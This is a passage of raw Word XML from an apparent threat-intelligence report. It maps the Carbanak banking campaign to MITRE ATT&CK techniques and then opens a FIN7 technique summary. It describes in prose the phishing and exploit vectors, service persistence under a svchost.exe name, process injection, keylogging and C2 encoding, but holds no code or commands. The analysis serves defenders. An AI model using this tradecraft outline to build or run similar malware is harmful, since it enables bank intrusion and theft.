        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidR="00CD4802">
        <w:t>An analysis of the campaign has revealed that the initial infections were achieved using spear phishing emails that appeared to be legitimate banking communications, with Microsoft Word 97 – 2003 (.doc) and Control Panel Applet (.CPL) files attached. We believe that the attackers also redirected to exploit kits website traffic that related to financial activity.</w:t>
      </w:r>
      <w:r w:rsidR="00141A58">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00141A58">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00141A58" w:rsidRPr="00141A58">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1566.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00141A58" w:rsidRPr="00141A58">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00141A58" w:rsidRPr="00141A58">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00141A58" w:rsidRPr="00141A58">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
      <w:r w:rsidR="00A65318">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidR="00A65318" w:rsidRPr="009F49DF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1204.002 : Malicious File</w:t>
      </w:r>
      <w:r w:rsidR="00A65318">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00141A58" w:rsidRPr="00141A58">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC8F182" w14:textId="76B50DB0" w:rsidR="00B67539" w:rsidRDefault="00B67539" w:rsidP="00CD4802">
      <w:r>
        <w:t xml:space="preserve">[1] In this case, the attachment was a CPL file compressed using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Roshal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Archive (.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADB0297" w14:textId="226DBD95" w:rsidR="00B67539" w:rsidRDefault="00B67539" w:rsidP="00CD4802">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>[1] An additional infection vector that we believe was used by the criminals is a classical drive-by-download attack. We have found traces of the Null and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RedKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploits kits</w:t>
      </w:r>
      <w:r w:rsidR="00141A58">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00141A58">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="002440E2" w:rsidRPr="002440E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002440E2" w:rsidRPr="002440E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1189 Drive-by Compromise</w:t>
      </w:r>
      <w:r w:rsidR="002440E2">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B77B4B" w14:textId="77FBB2F7" w:rsidR="00CD4802" w:rsidRDefault="00CD4802" w:rsidP="00CD4802">
      <w:r>
        <w:t xml:space="preserve">The email attachments exploit vulnerabilities in Microsoft Office 2003, 2007 and 2010 (CVE-2012-0158 and CVE-2013-3906) and Microsoft Word (CVE-2014-1761). Once the vulnerability is successfully exploited, the shellcode decrypts and executes the backdoor known as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Carbanak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A65318">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A65318">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00A65318" w:rsidRPr="00A65318">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A65318" w:rsidRPr="00A65318">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1203 Exploitation for Client Execution</w:t>
      </w:r>
      <w:r w:rsidR="00A65318">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720998D1" w14:textId="63BC4FA8" w:rsidR="00CD4802" w:rsidRDefault="00CD4802" w:rsidP="00CD4802">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Carbanak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is a remote backdoor (initially based on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Carberp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">), designed for espionage, data exfiltration and to provide remote access to infected machines. Once access is achieved, attackers perform a manual reconnaissance of the victim’s networks. Based on the results of this operation, the attackers use different lateral movement tools in order to get access to the critical systems in the victim´s infrastructure. They then install additional software such as the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ammyy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Remote Administration Tool, or even compromise SSH servers. Notably, some of the latest versions of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>analyzed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Carbanak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> malware appear not to use any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Carberp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> source code</w:t>
      </w:r>
      <w:r w:rsidR="00A65318">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A65318">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00A65318" w:rsidRPr="00A65318">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A65318" w:rsidRPr="00A65318">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1105 Ingress Tool Transfer</w:t>
      </w:r>
      <w:r w:rsidR="00A65318">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5959EF2C" w14:textId="78B71CFB" w:rsidR="00B67539" w:rsidRDefault="00B67539" w:rsidP="00CD4802">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Carbanak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> copies itself into “%system32%\com” with the name “svchost.exe” with the file attributes: system, hidden and read-only. The original file created by the exploit payload is then deleted. To ensure that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Carbanak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> has autorun privileges the malware creates a new service.</w:t>
      </w:r>
      <w:r w:rsidR="00791CB5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00791CB5">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00791CB5" w:rsidRPr="00791CB5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1543.003</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00791CB5" w:rsidRPr="00791CB5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Create or Modify System Process: Windows Service</w:t>
      </w:r>
      <w:r w:rsidR="00791CB5">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471300D7" w14:textId="07C3B05A" w:rsidR="00B67539" w:rsidRDefault="00B67539" w:rsidP="00CD4802">
      <w:r>
        <w:t xml:space="preserve">[1] Before creating the malicious service, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Carbanak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> determines if either the avp.exe or avpui.exe processes (components of Kaspersky Internet Security) is running.</w:t>
      </w:r>
      <w:r w:rsidR="00791CB5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00791CB5">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00791CB5" w:rsidRPr="00791CB5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00791CB5" w:rsidRPr="00791CB5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1480 Execution Guardrails</w:t>
      </w:r>
      <w:r w:rsidR="00791CB5">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A49C6D" w14:textId="18C7120E" w:rsidR="00D80200" w:rsidRDefault="00D80200" w:rsidP="00CD4802">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Carbanak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> injects its code into svchost.exe. Most of the actions described below happen within this process. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Carbanak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> downloads the file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>kldconfig.plug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from its C2 server. This file includes the names of the processes to be monitored. Once the system is infected, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Carbanak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> logs keystrokes and takes screenshots every 20 seconds. This monitoring is performed by intercepting the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ResumeThread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> call</w:t>
      </w:r>
      <w:r w:rsidR="00791CB5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00791CB5">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00040CB5" w:rsidRPr="00040CB5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1056.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00040CB5" w:rsidRPr="00040CB5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Input Capture: Keylogging</w:t>
      </w:r>
      <w:r w:rsidR="00040CB5" w:rsidRPr="00040CB5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00040CB5">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00791CB5" w:rsidRPr="00791CB5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1055 Process Injection</w:t>
      </w:r>
      <w:r w:rsidR="00791CB5">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FCF923" w14:textId="43592D77" w:rsidR="00D80200" w:rsidRDefault="00D80200" w:rsidP="00CD4802">
      <w:r>
        <w:t xml:space="preserve">[1] To communicate with its C2 server, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Carbanak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> uses the HTTP protocol with RC2+Base64 encryption, adding additional characters not included in Base64. It also inserts strings with different extensions (.gif,.htm, etc.) at random locations in the HTTP request</w:t>
      </w:r>
      <w:r w:rsidR="00791CB5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00791CB5">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00410C62">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00791CB5" w:rsidRPr="00C224B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00791CB5" w:rsidRPr="00C224B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1132 </w:t>
      </w:r>
      <w:r w:rsidR="00C224B4" w:rsidRPr="00C224B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data Encoding</w:t>
      </w:r>
      <w:r w:rsidR="00C224B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C224B4" w:rsidRPr="00C224B4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>T1573 Encrypted Channel</w:t>
      </w:r>
      <w:r w:rsidR="006A1981">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006A1981" w:rsidRPr="00460A19">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1102.002 : &lt;Web Service&gt;:Bidirectional Communication</w:t>
      </w:r>
      <w:r w:rsidR="00C224B4">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F321329" w14:textId="7FEF1EAA" w:rsidR="00E521F7" w:rsidRDefault="00E521F7" w:rsidP="00E521F7">
      <w:r>
        <w:t xml:space="preserve">[1] Some of these C2 servers are responsible for dropping </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ammyy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (configuration and executable files), the KLG plugin configuration (list of processes to monitor) and the VNC server (both 32 and 64 bits to be injected in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rundll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>). In one of the observed servers there was also a Metasploit module</w:t>
      </w:r>
      <w:r w:rsidR="004250B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004250B2">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="004250B2" w:rsidRPr="004250B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004250B2" w:rsidRPr="004250B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1219 : Remote Access Software</w:t>
      </w:r>
      <w:r w:rsidR="004250B2">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8B8790" w14:textId="77777777" w:rsidR="00CD4802" w:rsidRDefault="00CD4802" w:rsidP="00CD4802">
      <w:r>
        <w:t>[1] Once the attackers successfully compromise the victim´s network, the primary internal destinations are money processing services, Automated Teller Machines (ATM) and financial accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164AF995" w14:textId="114EC9B2" w:rsidR="00CD4802" w:rsidRDefault="00CD4802" w:rsidP="00CD4802">
      <w:r>
        <w:t>[1] As part of the attack´s reconnaissance phase, video recordings of the activities of bank employees, particularly system administrators, were made. The videos were sent to the C2 server</w:t>
      </w:r>
      <w:r w:rsidR="00B8720B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B8720B">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00B8720B" w:rsidRPr="00B8720B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B8720B" w:rsidRPr="00B8720B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1123 Audio Capture, T1041 Exfiltration Over C2 Channel</w:t>
      </w:r>
      <w:r w:rsidR="00B8720B">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36873919" w14:textId="5A593D74" w:rsidR="00B67539" w:rsidRDefault="00CD4802" w:rsidP="00CD4802">
      <w:r>
        <w:t>[1] Please note that the attackers abused the aforementioned services by impersonating legitimate local users who had the permissions to perform the actions later reproduced by the cybercriminals. As far as we know, none of the aforementioned services were attacked nor was any specific vulnerability within them exploited</w:t>
      </w:r>
      <w:r w:rsidR="00B8720B">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00B8720B" w:rsidRPr="00B8720B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">T1078 Valid </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B8720B" w:rsidRPr="00B8720B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Accounts</w:t>
      </w:r>
      <w:r w:rsidR="00B8720B">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7D6517D2" w14:textId="77777777" w:rsidR="00B67539" w:rsidRDefault="00B67539" w:rsidP="00CD4802">
      <w:r>
        <w:t>[1] There are indicators that point to a possible Chinese origin for the exploits used in these attachments. Command and Control (C2) servers located in China have been identified in this campaign. In addition, registration information for some of the domains use details of supposedly Chinese citizens. Obviously, all this could just be a red herring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D0753C" w14:textId="772305B5" w:rsidR="00B67539" w:rsidRDefault="00B67539" w:rsidP="00CD4802">
      <w:r>
        <w:t xml:space="preserve">[1] The targets were all employees affiliated to the affected institution. The spear phishing email messages appeared legitimate and in some cases were sent from compromised </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>coworkers´</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> accounts. In this way compromised systems were used as a transmission vector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159EE3FF" w14:textId="53518A6D" w:rsidR="00D80200" w:rsidRDefault="00D80200" w:rsidP="00CD4802">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidR="007B4B55" w:rsidRPr="007B4B55">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235CD49F" w14:textId="7FD15FCD" w:rsidR="00AB7E80" w:rsidRDefault="00AB7E80" w:rsidP="00CD4802">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">In order to render the malware less suspicious, the latest </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Carbanak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> samples are digitally signed</w:t>
      </w:r>
      <w:r w:rsidR="00141A58">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00141A58">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00141A58" w:rsidRPr="00141A58">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1036.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00141A58" w:rsidRPr="00141A58">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Masquerading: Invalid Code Signature</w:t>
      </w:r>
      <w:r w:rsidR="00141A58">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD6D366" w14:textId="69B5EE05" w:rsidR="00891095" w:rsidRDefault="00891095" w:rsidP="00CD4802">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2768F3CB" w14:textId="2BF7C113" w:rsidR="005369E4" w:rsidRDefault="005369E4" w:rsidP="005369E4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc153480879"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>FIN7</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w14:paraId="005D6CAB" w14:textId="77777777" w:rsidR="005369E4" w:rsidRPr="005B4630" w:rsidRDefault="005369E4" w:rsidP="005369E4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc153480880"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w14:paraId="2ADBAC58" w14:textId="77777777" w:rsidR="00DF1D2D" w:rsidRPr="00DF1D2D" w:rsidRDefault="00DF1D2D" w:rsidP="00DF1D2D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0046 - FIN7 is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486F655E" w14:textId="77777777" w:rsidR="00DF1D2D" w:rsidRPr="00DF1D2D" w:rsidRDefault="00DF1D2D" w:rsidP="00DF1D2D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group ATT&amp;CK attribution is Unknown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749096DF" w14:textId="77777777" w:rsidR="00DF1D2D" w:rsidRPr="00DF1D2D" w:rsidRDefault="00DF1D2D" w:rsidP="00DF1D2D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group TCERT attribution is RU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F8CD0A"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DEE55C"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Development ['T1583.001', 'T1587.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A119D09"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T1583.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Acquire Infrastructure&gt;:Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C25F53"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T1587.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1D2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
